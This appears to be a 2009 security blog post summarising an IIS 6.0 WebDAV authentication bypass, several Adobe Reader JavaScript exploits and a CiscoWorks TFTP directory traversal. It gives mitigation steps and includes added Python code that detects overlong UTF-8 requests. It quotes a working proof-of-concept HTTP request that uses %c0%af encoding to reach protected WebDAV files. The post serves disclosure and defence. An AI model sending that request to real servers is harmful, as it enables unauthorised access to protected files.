IIS 6.0 WebDav Exploit, Adobe 8-9.1 JavaScript Exploits, Cisco Works TFTPD Directory Traversal

Microsoft IIS 6.0 with WebDAV enabled is vulnerable to an authentication bypass. The exploit has already been made public:
http://www.milw0rm.com/exploits/8704

Proof of concept taken from above URL:

GET /prot%c0%afected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername
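
Added example (not part of the original post or the milw0rm proof of concept): the %c0%af in the request above is a percent-encoded overlong UTF-8 form of "/", so a proxy, WAF or log pipeline can flag request targets that contain such sequences. The function names and the benign sample request are constructed for illustration.

```python
import re

PCT_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2})+")  # runs of percent-encoded bytes
MIN_CP = {2: 0x80, 3: 0x800, 4: 0x10000}       # smallest code point needing n bytes

def overlong_sequences(target):
    """Return (offset, encoded_text, hidden_char) for every percent-encoded
    overlong UTF-8 sequence in a request target."""
    hits = []
    for m in PCT_RUN.finditer(target):
        raw = bytes.fromhex(m.group(0).replace("%", ""))
        i = 0
        while i < len(raw):
            b = raw[i]
            n = 2 if 0xC0 <= b < 0xE0 else 3 if 0xE0 <= b < 0xF0 else 4 if 0xF0 <= b < 0xF8 else 1
            seq = raw[i:i + n]
            if n == 1 or len(seq) < n or any(not 0x80 <= c <= 0xBF for c in seq[1:]):
                i += 1  # ASCII, stray continuation byte, or truncated sequence
                continue
            cp = b & (0xFF >> (n + 1))
            for c in seq[1:]:
                cp = (cp << 6) | (c & 0x3F)
            if cp < MIN_CP[n]:  # encoded with more bytes than needed
                hits.append((m.start() + 3 * i, m.group(0)[3 * i:3 * (i + n)], chr(cp)))
            i += n
    return hits

def inspect_request(raw_request):
    """Parse one raw HTTP request and report what a filter or IDS rule would key on."""
    lines = raw_request.splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target,
            "overlong": overlong_sequences(target),
            "translate_f": headers.get("translate", "").lower() == "f"}

# The request quoted on this page, and a constructed benign request with valid UTF-8.
PAGE_REQUEST = ("GET /prot%c0%afected/protected.zip HTTP/1.1\r\n"
                "Translate: f\r\nConnection: close\r\nHost: servername\r\n\r\n")
BENIGN_REQUEST = "GET /caf%c3%a9/menu.pdf HTTP/1.1\r\nHost: servername\r\n\r\n"

if __name__ == "__main__":
    for req in (PAGE_REQUEST, BENIGN_REQUEST):
        print(inspect_request(req))
```

Valid UTF-8 never uses an overlong form, so any hit from overlong_sequences() is worth rejecting or alerting on; the Translate: f flag is recorded only as context for triage.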

Adobe versions 8-9.1 have been smacked with more JavaScript command execution bugs. A lot of vendors are starting to recommend disabling JavaScript, something I suggested back in 2007 when I released the Adobe JavaScript DB backdoor. Here are links to the 5 Adobe exploits released on Milw0rm thus far (2009):

2009-05-04 Adobe Acrobat Reader 8.1.2 – 9.0 getIcon() Memory Corruption Exploit 7501 R D Abysssec
2009-04-29 Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit 8078 R D Arr1val
2009-04-29 Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit 7579 R D Arr1val
2009-03-24 Adobe Acrobat Reader JBIG2 Universal Exploit Bind Shell port 5500 8153 R D Black Security
2009-02-23 Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day 26871 R D Guido Landi

You can disable Adobe JavaScript as follows:
1. Launch Acrobat or Adobe Reader.
2. Select Edit>Preferences
3. Select the JavaScript Category
4. Uncheck the ‘Enable Acrobat JavaScript’ option
5. Click OK

CiscoWorks TFTP Directory Traversal Vulnerability. According to Cisco the following software types and versions are vulnerable:

Products that have TFTP services enabled and that run CiscoWorks Common Services versions 3.0.x, 3.1.x, and 3.2.x are vulnerable. Only CiscoWorks Common Services systems running on Microsoft Windows operating systems are affected.

Workarounds
To mitigate this vulnerability, administrators can disable TFTP services by completing the following steps:
Step 1. Choose “Start > Settings > Control Panel > Administrative Tools > Services” to access the Services window.
Step 2. Right-click “CWCS tftp service” and select “Properties”.
Step 3. Set the “Startup Type” to “Disabled”.
Step 4. Click the “Stop” button to stop the TFTP service.

Still waiting for details on a proof of concept for this.
